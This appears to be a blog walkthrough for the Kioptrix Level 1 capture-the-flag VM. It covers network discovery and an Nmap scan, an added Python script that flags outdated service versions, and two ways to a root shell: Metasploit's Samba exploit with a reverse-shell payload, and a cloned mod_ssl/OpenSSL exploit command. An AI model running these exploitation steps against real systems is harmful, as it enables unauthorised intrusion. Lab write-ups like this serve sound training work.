
KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT


Kioptrix Level 1 is a beginner level CTF challenge.
You can download this virtual machine from here
Details of Kioptrix:
Size: 186 MB
OS: Linux

Note:
In VirtualBox, set up a Bridged network (VirtualBox -> Preferences -> Network) and put both your Kali and Kioptrix machines on the Bridged network.
Fire up both machines (Kali and Kioptrix Level 1).

Kioptrix will ask for a login, which we don't know at the moment. This also means we can't find the IP of Kioptrix directly from the Kioptrix machine itself.
Leave the Kioptrix machine as it is and switch to Kali.
First we need to find the IP address of the Kioptrix machine.
We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address.
Command
sudo netdiscover -i eth0


Wait for the scan results.


192.168.233.130 seems to be the IP of the Kioptrix machine.
Let's scan this IP address using the tool Nmap (the scan will also verify that it's the IP of the Kioptrix machine).
Command
sudo nmap -sSVC 192.168.233.130
This command runs a SYN scan (-sS) together with service version detection (-sV) and Nmap's default scripts (-sC).
 

There are 5 open ports, and some of these look particularly juicy.
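The scan output is where a tester or defender decides which services are worth attention, and the deciding factor on this box is old software versions. The following is an added example, not code from the original post: it parses Nmap's grepable output (-oG, where each port entry is "port/state/proto/owner/service/rpcinfo/version/" and slashes inside version strings are written as "|") and flags any service whose version is below a policy baseline. The sample scan line is constructed for illustration (it borrows the Samba 2.2.1a and mod_ssl 2.8.4 versions identified in this walkthrough, the other values are made up), and the baselines of Samba 3.0 and mod_ssl 2.8.7 are assumed thresholds to adjust for your own environment.

```python
"""Flag legacy service versions in an Nmap grepable (-oG) scan line.

Added example for this walkthrough, not code from the original post.
The sample scan line and the minimum-version baselines are constructed
for illustration; replace them with your own scan output and policy.
"""
import re
from dataclasses import dataclass

# Constructed sample in -oG format (not the real scan from this post). Each
# port entry is "port/state/proto/owner/service/rpcinfo/version/" and Nmap
# writes '|' in place of '/' inside version strings.
SAMPLE_GREPABLE = (
    "Host: 192.168.233.130 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 2.9p2/, "
    "80/open/tcp//http//Apache httpd 1.3.20 (mod_ssl|2.8.4 OpenSSL|0.9.6b)/, "
    "111/open/tcp//rpcbind///, "
    "139/open/tcp//netbios-ssn//Samba smbd 2.2.1a/, "
    "443/open/tcp//ssl|https//Apache httpd 1.3.20 (mod_ssl|2.8.4 OpenSSL|0.9.6b)/"
)

# Assumed policy baselines: anything older than these is reported. Adjust to
# your own environment; the values here are illustrative, not from the post.
BASELINES = {"Samba": "3.0", "mod_ssl": "2.8.7"}


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str


def version_key(version: str):
    """Turn '2.2.1a' into ((2, ''), (2, ''), (1, 'a')) so versions compare in order."""
    key = []
    for part in version.split("."):
        m = re.match(r"(\d+)([A-Za-z]*)", part)
        if not m:
            break
        key.append((int(m.group(1)), m.group(2)))
    return tuple(key)


def parse_grepable(line: str):
    """Parse one 'Host:' line of -oG output into Service records (other lines give [])."""
    host_m = re.match(r"Host: (\S+)", line)
    ports_m = re.search(r"Ports: ([^\t]*)", line)
    if not host_m or not ports_m:
        return []
    services = []
    for entry in ports_m.group(1).split(", "):
        entry = entry[:-1] if entry.endswith("/") else entry  # drop the closing slash only
        fields = entry.split("/")
        if len(fields) < 7:
            continue
        port, state, proto, _owner, name, _rpc, version = fields[:7]
        services.append(Service(host_m.group(1), int(port), proto, state, name, version))
    return services


def flag_legacy(services, baselines=BASELINES):
    """Return (port, product, found_version, minimum) for every service below its baseline."""
    findings = []
    for svc in services:
        for product, minimum in baselines.items():
            # product name, then any non-digits, then the version number that follows it
            m = re.search(re.escape(product) + r"[^\d]*(\d+(?:\.\d+)*[A-Za-z]?)", svc.version)
            if m and version_key(m.group(1)) < version_key(minimum):
                findings.append((svc.port, product, m.group(1), minimum))
    return findings


if __name__ == "__main__":
    for port, product, found, minimum in flag_legacy(parse_grepable(SAMPLE_GREPABLE)):
        print(f"tcp/{port}: {product} {found} is below baseline {minimum}")
```

Run a real scan with an extra -oG scan.gnmap and feed each "Host:" line to parse_grepable; the version comparison is deliberately simple (numeric components with an optional letter suffix, as in 2.2.1a) and will not understand vendor-specific version schemes, so treat its output as a shortlist to verify rather than a verdict.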
*******************************************************************************
First we go with the Metasploit method.
Port 139 enumeration:
We can see some info about Samba (SMB).
Fire up Metasploit using the command msfconsole
We are going to use the SMB version detection module of Metasploit; search for the module using the command
search smb_version


We get a matching module; let's use this module via the command use 0
Use the command options to see the various parameters that need to be filled in.


We need to set RHOSTS (the Kioptrix machine IP); use the command
set rhosts 192.168.233.130
and run the scanner.


We get some info about the host, i.e. Samba 2.2.1a.
Let's search whether any exploit exists for Samba 2.2.1a.
I found one on Rapid7.


Scroll down and copy the exploit module's path.

Paste the exploit path into Metasploit.
The payload is set to the default.
Use the command options to see the fields that need to be filled in.


We need to set RHOSTS again and also change the payload.
(It is necessary to change the payload from the default to a non-Meterpreter shell, because the default payload is very unstable and the Meterpreter shell will die immediately.)
Change the payload using the command
set payload linux/x86/shell_reverse_tcp


Run the exploit.


We get a session and, guess what, we are already the root user.
To find the root flag, scroll down to the bottom of this blog.
Happy hacking ;)

**********************************************************************************
Moving on to the other method (getting root without Metasploit).
Port 80/443 enumeration:
We see some info about mod_ssl 2.8.4.
Search Google for a related exploit and you will see a GitHub repository.


Clone it according to the instructions below.

Instead of the Op****ck name, I saved it as open.


We run the open file first and select the appropriate target for us.


Scroll down and see the various targets.


0x6b matches our requirements (we may need to try various others to find a working one).
Let's use it in the required format (as given in the GitHub repository).
Use the command
./open 192.168.233.130 443 -c 40


We get a shell.
And guess what, we are root again.

Happy hacking ;)


*********************************************************************************

Let's grab the root flag.

Use the command cd /var/mail and then the cat command to read the root file.

That's all for this machine.
